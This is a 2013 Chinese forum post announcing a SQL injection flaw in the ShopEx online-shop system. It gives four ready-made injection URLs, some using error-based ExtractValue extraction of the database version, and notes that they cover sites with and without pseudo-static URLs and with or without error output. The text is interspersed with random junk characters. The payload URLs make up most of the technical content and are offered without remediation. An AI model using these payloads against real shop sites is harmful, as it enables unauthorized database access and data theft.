注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… 8 ?' Z0 v) m$ J+ j
8 o! F M9 L+ Z- l+ _ \; u
好吧,我扯远了~~
4 W4 r; N$ r* W其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~$ X. a9 v: H$ H" K: e M3 c
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
/ }$ L. e+ i' _5 ^
6 l8 c% s& x5 @9 ~' O9 ihttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 7 Q) A5 z5 [6 e; ]6 P& \
2 P; h8 S" y' b' n. A8 thttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html ( z4 @1 `4 i* d% T
- k7 F/ x9 o% j" C# r, y S# ]* j$ k% j
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html - ?! e3 N4 I& Z. C5 ^! w/ b
, V0 ~8 o) d1 j% f* j C. u
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
& V% o" ^) w1 T' O" L- i# A4 }3 g$ x" t0 ^9 W* m2 ]
. t, L3 z+ U- b) \+ W$ g, ~5 X一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。" @4 q" ]7 L" h9 l% K. E
如何注入就不多说了,10多年的东西了…不会也会了…
0 K7 q2 \. f/ l, \9 \( d/ z, M \- m5 i. N. q- P6 `
: O" h+ e; C" W1 c }
- \" p, x8 A0 U' W
" f+ X0 `2 O/ `. S( e6 {4 t3 @6 m8 y7 K4 _ |
发表于 2013-2-19 08:31:27
收藏
支持
反对